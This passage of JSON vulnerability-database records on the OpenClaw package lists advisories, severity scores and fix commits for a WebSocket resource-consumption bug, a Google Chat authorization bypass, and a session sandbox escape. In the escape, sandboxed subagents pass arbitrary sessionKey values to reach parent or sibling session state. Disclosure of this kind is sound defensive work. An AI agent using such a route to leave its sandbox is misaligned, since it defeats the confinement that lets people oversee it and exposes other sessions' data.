Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 still parses oversized pre-start voice-call WebSocket frames before start validation, and the unreleased maxPayload fix confirms the shipped resource-consumption bug remains open.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 
2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `9abcfdadf591bf266d85fbdfe14ae833e557a110` — 2026-03-31T19:47:10+09:00\n\nOpenClaw thanks @Kazamayc for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41400","reference_id":"","reference_type":"","scores":[{"value":"0.00164","scoring_system":"epss","scoring_elements":"0.37267","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00164","scoring_system":"epss","scoring_elements":"0.37242","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00164","scoring_system":"epss","scoring_elements":"0.37274","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41400"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/9abcfdadf591bf266d85fbdfe14ae833e557a110","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/"}],"url":"https://github.com/openclaw/openclaw/commit/9abcfdadf591bf266d85fbdfe14ae833e557a110"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":""
,"scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2w79-r9g8-wmcr","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2w79-r9g8-wmcr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41400","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41400"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-oversized-websocket-frames-in-voice-call","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/P
R:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-oversized-websocket-frames-in-voice-call"},{"reference_url":"https://github.com/advisories/GHSA-2w79-r9g8-wmcr","reference_id":"GHSA-2w79-r9g8-wmcr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2w79-r9g8-wmcr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-
spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-
6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41400","GHSA-2w79-r9g8-wmcr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9xrt-mv81-3yc8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91406?format=json","vulnerability_id":"VCID-a2p8-ydn6-3bbr","summary":"OpenClaw: Google Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName\n## Summary\n\nGoogle Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGoogle Chat group authorization previously relied on mutable space display names, which allowed policy rebinding when names changed or collided. 
Commit `11ea1f67863d88b6cbcb229dd368a45e07094bff` requires stable group IDs for access decisions.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `11ea1f67863d88b6cbcb229dd368a45e07094bff`.\n\n## Fix Commit(s)\n\n- `11ea1f67863d88b6cbcb229dd368a45e07094bff`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35617","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20285","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20323","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20333","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35617"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/11ea1f67863d88b6cbcb229dd368a45e07094bff","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/"}],"url":"https://github.com/openclaw/openclaw/commit/11ea1f67863d88b6cbcb229dd368a45e07094bff"},{"reference_url":"https://github.com/openclaw/
openclaw/security/advisories/GHSA-52q4-3xjc-6778","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-52q4-3xjc-6778"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35617","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35617"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-group-policy-rebinding-with-mutable-space-displayname","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-group-policy-rebinding-with-mutable-space-displayname"},{"reference_url":"https://github.com/advisories/GHSA-52q4-3xjc-6778","refere
nce_id":"GHSA-52q4-3xjc-6778","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-52q4-3xjc-6778"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b
8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2u
m4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc
58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35617","GHSA-52q4-3xjc-6778"],"risk_score":1.9,"exploitability":"0.5","weighted_severity":"3.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a2p8-ydn6-3bbr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90993?format=json","vulnerability_id":"VCID-a2t8-px5b-nfgd","summary":"Duplicate Advisory: `OpenClaw: session_status` let sandboxed subagents access parent or sibling session state\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-wcxr-59v9-rxr8. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw before 2026.3.11 contains a session sandbox escape vulnerability in the session_status tool that allows sandboxed subagents to access parent or sibling session state. 
Attackers can supply arbitrary sessionKey values to read or modify session data outside their sandbox scope, including persisted model overrides.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wcxr-59v9-rxr8","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wcxr-59v9-rxr8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32918","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32918"},{"refe
rence_url":"https://www.vulncheck.com/advisories/openclaw-session-sandbox-escape-via-session-status-tool","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-session-sandbox-escape-via-session-status-tool"},{"reference_url":"https://github.com/advisories/GHSA-hh43-q692-2xmq","reference_id":"GHSA-hh43-q692-2xmq","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hh43-q692-2xmq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/984097?format=json","purl":"pkg:npm/openclaw@2026.3.11-beta.1","is_vulnerable":tru